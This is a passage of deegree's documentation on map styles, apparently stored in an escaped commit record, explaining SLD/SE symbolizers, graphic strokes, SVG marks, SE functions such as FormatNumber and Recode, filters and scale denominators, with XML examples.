name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n <SvgParameter name=\"deegree-graphicstroke-rotation\">0<\/SvgParameter>\n<\/Stroke>\n----\n\nNOTE: A typical usage is to draw an arrowhead on a line. This can be\nachieved by using a filled `triangle` _Mark_ which is rotated 90 degrees\nto the left (`-90`) with an anchor point of `0.75` \/ `0.5` and\n`deegree-graphicstroke-position-percentage` of `0` for the beginning\nof a line. 
To draw it at the end of a line, the _Mark_ has to be rotated\n90 degrees to the right (`90`) with an anchor point of `0.25` \/ `0.5`\nand `deegree-graphicstroke-position-percentage` of `100`.\n\n*Rendering of images or SVGs along a geometry*\n\nBoth images and SVGs can be drawn along a geometry, but it should be\nnoted that these are best suited for signatures that are drawn only\nonce or with some gap.\nExample of a single SVG at the middle of the line:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <ExternalGraphic>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <\/ExternalGraphic>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n <SvgParameter name=\"deegree-graphicstroke-position-percentage\">50<\/SvgParameter>\n<\/Stroke>\n----\n\n*Rendering of SVGs as Mark*\n\nTo draw only the outline or fill of an SVG with a single color, an SVG\ncan be used as a `Mark`. Example:\n\n[source,xml]\n----\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n <OnlineResource xlink:href=\".\/sample.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke-opacity\">0.0<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>20<\/Size>\n <\/Graphic>\n <\/GraphicStroke>\n<\/Stroke>\n----\n\nNOTE: Previous versions would have rendered an SVG defined in a\n`Graphic`\/`ExternalGraphic`\/`OnlineResource` like the `Mark` example above.\nSuch configurations must either be converted to\n`Graphic`\/`Mark`\/`OnlineResource`, or the option to not render SVGs like\nimages has to be set for the instance, see <<anchor-appendix>> for details.\n\n==== SE & FE Functions\n\nThere are a couple of deegree-specific functions which can be expressed\nas standard OGC function expressions in SLD\/SE. Additionally deegree has\nsupport for all the functions defined within the SE standard.\n\n===== FormatNumber\n\nThis function is needed to format number attributes. 
It can be used like\nin the following example:\n\n[source,xml]\n----\n<FormatNumber xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <NumericValue>\n <ogc:PropertyName>app:SHAPE_LEN<\/ogc:PropertyName>\n <\/NumericValue>\n <Pattern>############.00<\/Pattern>\n<\/FormatNumber>\n----\n\n===== FormatDate\n\nThis function is fully supported, although not fully tested with all\navailable schema types mentioned in the spec.\n\n[source,xml]\n----\n<FormatDate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <DateValue>\n <ogc:PropertyName>app:TIMESTAMP<\/ogc:PropertyName>\n <\/DateValue>\n <Pattern>DD<\/Pattern>\n<\/FormatDate>\n----\n\n===== ChangeCase\n\nThis function is used to change the case of property values.\n\n[source,xml]\n----\n<ChangeCase xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" direction=\"toUpper\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/ChangeCase>\n----\n\n===== Concatenate\n\nWith the concatenate function it is possible to merge the values of more\nthan one property to a chain.\n\n[source,xml]\n----\n<Concatenate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text1<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text2<\/ogc:PropertyName>\n <\/StringValue>\n <StringValue>\n <ogc:PropertyName>app:text3<\/ogc:PropertyName>\n <\/StringValue>\n<\/Concatenate>\n----\n\n===== Trim\n\nThe trim function is used to trim string property values.\n\n[source,xml]\n----\n<Trim xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" stripOffPosition=\"both\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/Trim>\n----\n\n===== StringLength\n\nWith the StringLength function it is possible to calculate the length of\nstring property values.\n\n[source,xml]\n----\n<StringLength xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringLength>\n----\n\n===== Substring\n\nWith the substring function it is possible to only get a specific\nsubstring of a string property.\n\n[source,xml]\n----\n<Substring xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <Position>1<\/Position>\n <Length>\n <ogc:Sub>\n <StringPosition fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName>app:text<\/ogc:PropertyName>\n <\/StringValue>\n <\/StringPosition>\n <ogc:Literal>1<\/ogc:Literal>\n <\/ogc:Sub>\n <\/Length>\n<\/Substring>\n----\n\n===== StringPosition\n\nThe StringPosition function is made to get the literal at a specific\nposition from a string property.\n\n[source,xml]\n----\n<StringPosition xmlns:app=\"http:\/\/www.deegree.org\/app\" 
xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\" searchDirection=\"frontToBack\">\n <LookupString>-<\/LookupString>\n <StringValue>\n <ogc:PropertyName xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\">app:text<\/ogc:PropertyName>\n <\/StringValue>\n<\/StringPosition>\n----\n\n===== Categorize, Interpolate, Recode\n\nThese functions can operate both on alphanumeric properties of features\nand on raster data. For color values we extended the syntax a bit to\nallow for an alpha channel: #99ff0000 is a red value with an alpha value\nof 0x99. This allows the user to create eg. an interpolation from\ncompletely transparent to a completely opaque color value. To work on\nraster data you'll have to replace the PropertyName values with\nRasterdata.\n\nFor Interpolate only linear interpolation is currently supported.\n\n[source,xml]\n----\n<Categorize xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" fallbackValue=\"#fefdC3\">\n <LookupValue>\n <ogc:PropertyName>app:POP2000<\/ogc:PropertyName>\n <\/LookupValue>\n <Value>#FFE9D8<\/Value>\n <Threshold>1000<\/Threshold>\n <Value>#FBCFAC<\/Value>\n <Threshold>10000<\/Threshold>\n <Value>#FAAC6F<\/Value>\n <Threshold>25000<\/Threshold>\n <Value>#FD913D<\/Value>\n <Threshold>100000<\/Threshold>\n <Value>#FF7000<\/Value>\n<\/Categorize>\n----\n\n[source,xml]\n----\n<Interpolate xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"#005C29\" method=\"color\">\n <LookupValue>\n <ogc:PropertyName>app:CODE<\/ogc:PropertyName>\n <\/LookupValue>\n <InterpolationPoint>\n <Data>-1<\/Data>\n <Value>#005C29<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>100<\/Data>\n <Value>#067A3A<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>300<\/Data>\n <Value>#03A64C<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>500<\/Data>\n <Value>#00CF5D<\/Value>\n <\/InterpolationPoint>\n <InterpolationPoint>\n <Data>1000<\/Data>\n <Value>#ffffff<\/Value>\n <\/InterpolationPoint>\n<\/Interpolate>\n----\n\n[source,xml]\n----\n<Recode xmlns:app=\"http:\/\/www.deegree.org\/app\" xmlns=\"http:\/\/www.opengis.net\/se\" fallbackValue=\"\">\n <LookupValue>\n<ogc:PropertyName>app:code<\/ogc:PropertyName>\n <\/LookupValue>\n <MapItem>\n <Data>1000<\/Data>\n <Value>water<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>2000<\/Data>\n <Value>nuclear<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>3000<\/Data>\n <Value>solar<\/Value>\n <\/MapItem>\n <MapItem>\n <Data>4000<\/Data>\n <Value>wind<\/Value>\n <\/MapItem>\n<\/Recode>\n----\n\n===== General XPath functions\n\nMany useful things can be done by simply using standard XPath 1.0\nfunctions in PropertyName elements.\n\nAccess the (local) name of an element (e.g. the name of a referenced\nfeature \/ subfeature).\n\n[source,xml]\n----\n<PropertyName xmlns:app=\"http:\/\/www.deegree.org\/app\">app:subfeature\/*\/local-name()<\/PropertyName>\n----\n","old_contents":"[[anchor-configuration-renderstyles]]\n== Map styles\n\nStyle resources are used to obtain information on how to render geo\nobjects (mostly features, but also coverages) into maps. The most common\nuse case is to reference them from a layer configuration, in order to\ndescribe how the layer is to be rendered. This chapter assumes the\nreader is familiar with basic SLD\/SE terms. 
The style configurations do\nnot depend on any other resource.\n\nIn contrast to other deegree configurations the style configurations do\nnot have a custom format. You can use standard SLD or SE documents\n(1.0.0 and 1.1.0 are supported), with a couple of deegree specific\nextensions, which are described below. Please refer to the\nhttp:\/\/www.opengeospatial.org\/standards\/sld[SLD] and\nhttp:\/\/www.opengeospatial.org\/standards\/se[SE] specifications for\nreference. Additionally this page contains specific examples below.\n\nIn deegree terms, each SLD or SE file will create a _style store_. In\ncase of an SE file (usually beginning at the FeatureTypeStyle or\nCoverageStyle level) the style store only contains one style, in case of\nan SLD file the style store may contain multiple styles, each identified\nby the layer (only NamedLayers make sense here) and the name of the\nstyle (only UserStyles make sense) when referenced later.\n\n.Style resources define how geo objects are rendered\nimage::workspace-overview-style.png[Style resources define how geo objects are rendered,scaledwidth=80.0%]\n\nTIP: When defining styles, take note of the log file. Upon startup the log\nwill warn you about potential problems or errors during parsing, and\nupon rendering warnings will be emitted when rendering is unsuccessful\neg. because you had a typo in a geometry property name. When you're\nseeing an empty map when expecting a fancy one, check the log before\nreporting a bug. deegree will tolerate a lot of syntactical errors in\nyour style files, but you're more likely to get a good result when your\nfiles validate and you have no warnings in the log.\n\n=== Overview\n\nFrom the point of view of the Symbology Encoding Standard, there are 5\nkinds of symbolizations, which can be present in a map image:\n\n * *Point symbolizations*\n * *Line symbolizations*\n * *Polygon symbolizations*\n * *Text symbolizations*\n * *Raster symbolizations*\n\nThe first 4 symbolizations usually represent vector feature objects.\nRaster symbolization is used to visualize raster data. This\ndocumentation chapter describes, how those symbolizations can be\nrealized using OGC symbology encoding. It will lead from the underlying\nbasics to some more complex constructions for map visulization.\n\n=== Basics\n\n==== General Layout\n\nThe general structure of an SE-Style contains:\n\n[source,xml]\n----\n<FeatureTypeStyle>\n<FeatureTypeName> \n<Rule> \n----\n\nIt is constructed like this:\n\n[source,xml]\n----\n<FeatureTypeStyle xmlns=\"http:\/\/www.opengis.net\/se\" xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\" xmlns:sed=\"http:\/\/www.deegree.org\/se\" xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\" xmlns:plan=\"http:\/\/www.deegree.org\/plan\" xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\" xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <FeatureTypeName>plan:yourFeatureType<\/FeatureTypeName>\n <Rule>\n ...\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\nTIP: Before you start, always remember that every style is read top-down. So\nbe aware the second <Rule> will overpaint the first one, the third\noverpaints the second and so on\n\n==== Symbolization Rules\n\nEvery specific map visualization needs its own symbolization rule. Rules\nare defined within the *<Rule>* element. Each rule can consist of at\nleast one symbolizer. 
Every rule has its own name and description\nelements. The description elements are used to create the legend caption\nfrom it.\n\nDepending on the type of symbolization to create, one of the following\nsymbolizers can be used:\n\n* <PointSymbolizer>\n* <LineSymbolizer>\n* <PolygonSymbolizer>\n* <TextSymbolizer>\n* <RasterSymbolizer>\n\nSymbolizers can have an uom-attribute (units of measure), which\ndetermines the unit of all values set inside the Symbolizer. The\nfollowing values for UoM are supported within deegree:\n\n* uom=\"pixel\"\n* uom=\"meter\"\n* uom=\"mm\"\n\nThe default value is \"pixel\".\n\nWithin every symbolizer (except rastersymbolizers), a geometry property\nused for the rendering, can be specified with the *<Geometry>* element.\nIf there is no geometry specified the first geometry property of the\nFeatureType will be used.\n\nEach of the (Vector-)Symbolizer-elements has its dimensions, which are\ndescribed in more detail below:\n\n\n* *<LineSymbolizer>* has only one dimension: the <Stroke>-element (to\nstyle the stroke).\n* *<PolygonSymbolizer>* has two dimensions: the <Stroke> (to sytle the\nstroke of the polygon) and the <Fill>-element (to style the inside of\nthe polygon).\n* *<PointSymbolizer>* can also contain both dimensions: the <Stroke> (to\nstyle the stroke of the point) and the <Fill>-element (to style the\ninside of the point).\n* *<TextSymbolizer>* has three dimensions: the <Label> (to set the\nproperty, which is to be styled), the <Font> (to style the font) and the\n<Fill>-element (to style the inside of the font).\n\n\n===== Stroke\n\nTo describe a <Stroke>, a number of different <SvgParameter> can be\nused.\n\n* `name=\"stroke\"` => The stroke (color) is defined by the hex color code\n(e.g. black ==> #000000).\n* `name=\"opacity\"` => Opacity can be set by a percentage number, written\nas decimal (e.g. 0,25 => 25% opacity).\n* `name=\"with\"` => Wide or thin, set your stroke-width however you want.\n* `name=\"linecap\"` => For linecap (ending) a stroke you can choose the\nfollowing types: round, edged, square, butt.\n* `name=\"linejoin\"` => Also there are different types of linejoin\npossibilities: round, mitre, bevel.\n* `name=\"dasharray\"` => The dasharray defines where the stroke is painted\nand where not (e.g. \"1 1\" => - - - ).\n\n\n[source,xml]\n----\n<LineSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>layer:position<\/ogc:PropertyName>\n <\/Geometry>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">0.5<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <SvgParameter name=\"stroke-linecap\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-linejoin\">round<\/SvgParameter>\n <SvgParameter name=\"stroke-dasharray\">1 1<\/SvgParameter>\n <\/Stroke>\n<\/LineSymbolizer>\n----\n\n===== Fill\n\nFor the visualization of polygons, points and texts, the <Fill> element\ncan be used additional to styling the <Stroke>. 
You can set the\nfollowing <SvgParameter>:\n\n* name=\"fill\" (color)\n* name=\"fill-opacity\"\n\nThese two <SvgParameter> work like those of <Stroke>.\n\n[source,xml]\n----\n<PolygonSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.5<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <...>\n <\/Stroke>\n<\/PolygonSymbolizer>\n----\n\n===== Font\n\nFor the creation of a <TextSymbolizer>, certain parameters for the\ndisplayed text have to be set. Every <TextSymbolizer> needs a <Label> to\nbe specified. The <Font> to be used for the text symbolization can be\nset with <SvgParameter> elements. These are the possible <SvgParameter>:\n\n* `name=\"font-family\"` => Possible types are: e.g. Arial, Times Roman,\nSans-Serif\n* `name=\"font-weight\"` => Possible types are: normal, bold, bolder,\nlighter\n* `name=\"font-size\"` => Possible values are integer values\n\n\nWith a <Fill>-element, the color and opacity of the font can be defined.\nThis method is used to show text which is stored in your database.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <...>\n <\/Geometry>\n <Label>\n <ogc:PropertyName>layer:displayedProperty<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">3<\/SvgParameter>\n <\/Font>\n <Fill>\n <...>\n <\/Fill>\n<\/TextSymbolizer>\n----\n\n==== Advanced symbolization\n\nThere are numerous possibilities for advanced symbolization. This\nchapter describes the basic components of advanced map styling using\nsymbology encoding.\n\n===== Using Graphics\n\nThere are different ways to use graphical symbols as a base for map\nsymbolizations. <Mark> elements can be used to specify well known\ngraphics, <ExternalGraphic> elements can be used to have external\ngraphic files as a base for a symbolization rule.\n\n*Mark*\n\nWith Marks it is possible to use wellknown objects for symbolization as\nwell as user-generated content like SVGs. It is possible to use all of\nthese for <PointSymbolizer>, <LineSymbolizer> and <PolygonSymbolizer>.\n\nFor a <PointSymbolizer> the use of a Mark looks like the following:\n\n[source,xml]\n----\n<PointSymbolizer uom=\"meter\">\n <Geometry>\n ...\n <\/Geometry>\n <Graphic>\n <Mark>\n ...\n----\n\nFor <LineSymbolizer> and <PolygonSymbolizer> it works like this:\n\n[source,xml]\n----\n<Geometry>\n ...\n<\/Geometry>\n<Stroke>\n <GraphicStroke>\n <Graphic>\n <Mark>\n ...\n----\n\nThe following wellknown objects can be used within Marks:\n\n * circle\n * triangle\n * star\n * square\n * x ==> creates a cross\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n ...\n <\/Fill>\n<\/Mark>\n----\n\nIncluding an SVG graphic within a mark might look like this:\n\n[source,xml]\n----\n<Mark>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\" xlink:type=\"simple\"\n xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>svg<\/Format>\n <Fill>\n ...\n <\/Fill>\n <Stroke>\n ...\n <\/Stroke>\n<\/Mark>\n----\n\n*ExternalGraphic*\n\n<ExternalGraphic>-elements can be used to embed graphics taken from a\ngraphic file (e.g. SVGs or PNGs). The <OnlineResource> sub-element gives\nthe URL of the graphic file.\n\nTIP: Make sure you don't forget the MIME-type in the <Format>-sub-element\n(e.g. \"image\/svg\" or \"image\/png\").
\"image\/svg\" or \"image\/png\").\n\n[source,xml]\n----\n<Graphic>\n <ExternalGraphic>\n <OnlineResource xmlns:xlink=\"http:\/\/www.w3.org\/1999\/xlink\"\n xlink:type=\"simple\" xlink:href=\"\/filepath\/symbol.svg\" \/>\n <Format>image\/svg<\/Format>\n <\/ExternalGraphic>\n <Size>10<\/Size>\n ...\n<\/Graphic>\n----\n\n===== Size\n\nOf course everything has its own <Size>. The size is defined directly\nafter <Mark> or <ExternalGraphic>.\n\n[source,xml]\n----\n<Mark>\n <WellKnownName>triangle<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n<\/Mark>\n<Size>3<\/Size>\n----\n\n===== Gap\n\nIt is possible to define Gaps for graphics within <LineSymbolizer> or\n<PolygonSymbolizer>. For this the <Gap>-element can be used like this:\n\n[source,xml]\n----\n<GraphicStroke>\n <Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <\/Graphic>\n <Gap>20<\/Gap>\n<\/GraphicStroke>l\n----\n\n===== Rotation\n\nSymbology Encoding enables the possibility to rotate every graphic\naround its center with the <Rotation>-element. This goes from zero to\n360 degrees. The rotation is clockwise unless it's negative, then it's\ncounter-clockwise.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n <Size>3<\/Size>\n <Rotation>180<\/Rotation>\n<\/Graphic>\n----\n\n===== Displacement\n\nThe <Displacement>-element allows to paint a graphic displaced from his\ngiven position. Negative and positive values are possible. THe\ndisplacement must be set via the X and Y displacement elements.\n\n[source,xml]\n----\n<Graphic>\n <Mark>\n ...\n <\/Mark>\n ...\n <Displacement>\n <DisplacementX>5<\/DisplacementX>\n <DisplacementY>5<\/DisplacementY>\n <\/Displacement>\n<\/Graphic>\n----\n\n===== Halo\n\nA nice possibility to highlight your font, is the <Halo>-element. The\n<Radius>-sub-element defines the size of the border.\n\n[source,xml]\n----\n<TextSymbolizer uom=\"meter\">\n <Geometry>\n <ogc:PropertyName>xplan:position<\/ogc:PropertyName>\n <\/Geometry>\n <Label>\n ...\n <\/Label>\n <Font>\n ...\n <\/Font>\n <LabelPlacement>\n ...\n <\/LabelPlacement>\n <Halo>\n <Radius>1.0<\/Radius>\n <Fill>\n ...\n <\/Fill>\n <\/Halo>\n ...\n<\/TextSymbolizer>\n----\n\n=== Using Filters\n\nWithin symbolization rules, it is possible to use Filter Encoding\nexpressions. 
=== Basic Examples\n\n==== Point Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Weatherstations<\/Name>\n <Rule>\n <Name>Weatherstations<\/Name>\n <Description>\n <Title>Weatherstations in Utah<\/Title>\n <\/Description>\n <ogc:Filter>\n <ogc:PropertyIsEqualTo>\n <ogc:PropertyName>SomeProperty<\/ogc:PropertyName>\n <ogc:Literal>100<\/ogc:Literal>\n <\/ogc:PropertyIsEqualTo>\n <\/ogc:Filter>\n <PointSymbolizer>\n <Graphic>\n <Mark>\n <WellKnownName>square<\/WellKnownName>\n <Fill>\n <SvgParameter name=\"fill\">#FF0000<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/Mark>\n <Size>13<\/Size>\n <\/Graphic>\n <\/PointSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Line Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\nxmlns=\"http:\/\/www.opengis.net\/se\"\nxmlns:app=\"http:\/\/www.deegree.org\/app\"\nxmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\nxmlns:sed=\"http:\/\/www.deegree.org\/se\"\nxmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\nxmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\nxsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Railroads<\/Name>\n <Rule>\n <Name>Railroads<\/Name>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#ffffff<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1.5<\/SvgParameter>\n <\/Stroke>\n <\/LineSymbolizer>\n <LineSymbolizer>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">0.3<\/SvgParameter>\n <\/Stroke>\n <PerpendicularOffset>-1.5<\/PerpendicularOffset>\n <\/LineSymbolizer>\n <\/Rule> \n<\/FeatureTypeStyle>\n----\n\n==== Polygon Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>LandslideAreas<\/Name>\n <Rule>\n <Name>LandslideAreas<\/Name>\n <Description>\n <Title>LandslideAreas<\/Title>\n 
<\/Description>\n <PolygonSymbolizer>\n <Fill>\n <SvgParameter name=\"fill\">#cc3300<\/SvgParameter>\n <SvgParameter name=\"fill-opacity\">0.3<\/SvgParameter>\n <\/Fill>\n <Stroke>\n <SvgParameter name=\"stroke\">#000000<\/SvgParameter>\n <SvgParameter name=\"stroke-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"stroke-width\">1<\/SvgParameter>\n <\/Stroke>\n <\/PolygonSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n==== Text Symbolizer\n\n[source,xml]\n----\n<FeatureTypeStyle\n xmlns=\"http:\/\/www.opengis.net\/se\"\n xmlns:app=\"http:\/\/www.deegree.org\/app\"\n xmlns:ogc=\"http:\/\/www.opengis.net\/ogc\"\n xmlns:sed=\"http:\/\/www.deegree.org\/se\"\n xmlns:deegreeogc=\"http:\/\/www.deegree.org\/ogc\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.opengis.net\/se http:\/\/schemas.opengis.net\/se\/1.1.0\/FeatureStyle.xsd http:\/\/www.deegree.org\/se http:\/\/schemas.deegree.org\/3.5\/se\/Symbolizer-deegree.xsd\">\n <Name>Municipalities<\/Name>\n <Rule>\n <Name>Municipalities<\/Name>\n <Description>\n <Title>Municipalities<\/Title>\n <\/Description>\n <MaxScaleDenominator>200000<\/MaxScaleDenominator>\n <TextSymbolizer>\n <Label>\n <ogc:PropertyName>app:NAME<\/ogc:PropertyName>\n <\/Label>\n <Font>\n <SvgParameter name=\"font-family\">Arial<\/SvgParameter>\n <SvgParameter name=\"font-family\">Sans-Serif<\/SvgParameter>\n <SvgParameter name=\"font-weight\">bold<\/SvgParameter>\n <SvgParameter name=\"font-size\">12<\/SvgParameter>\n <\/Font>\n <Halo>\n <Radius>1<\/Radius>\n <Fill>\n <SvgParameter name=\"fill-opacity\">1.0<\/SvgParameter>\n <SvgParameter name=\"fill\">#fefdC3<\/SvgParameter>\n <\/Fill>\n <\/Halo>\n <Fill>\n <SvgParameter name=\"fill\">#000000<\/SvgParameter>\n <\/Fill>\n <\/TextSymbolizer>\n <\/Rule>\n<\/FeatureTypeStyle>\n----\n\n=== SLD\/SE clarifications\n\nThis chapter is meant to clarify deegree's behaviour when using standard\nSLD\/SE constructs.\n\n==== Perpendicular offset\/polygon orientation\n\nFor polygon rendering, the orientation is always fixed, and will be\ncorrected if a feature store yields inconsistent geometries. The outer\nring is always oriented counterclockwise; inner rings are oriented\nclockwise.\n\nA positive perpendicular offset setting results in an offset movement in\nthe outer direction, a negative setting moves the offset into the\ninterior. For inner rings the effect is flipped (a positive setting\nmoves into the interior of the inner ring, a negative setting moves into\nthe exterior of the inner ring).\n\n==== ScaleDenominators\n\nThe use of MinScaleDenominators and MaxScaleDenominators within SLD\/SE\nfiles can easily be misunderstood because of the meaning of a high or a\nlow scale. Therefore, this is clarified here according to the standard.\nIn general the MinScaleDenominator is always a smaller number than the\nMaxScaleDenominator. The following example explains how it works:\n\n[source,xml]\n----\n<MinScaleDenominator>25000<\/MinScaleDenominator>\n<MaxScaleDenominator>50000<\/MaxScaleDenominator>\n----\n\nThis means that the Symbolizer is used for scales between 1:25000\nand 1:50000.\n\n=== deegree specific extensions\n\ndeegree supports some extensions of SLD\/SE and filter encoding to enable\nmore sophisticated styling. The following sections describe the\nrespective extensions for SLD\/SE and filter encoding. 
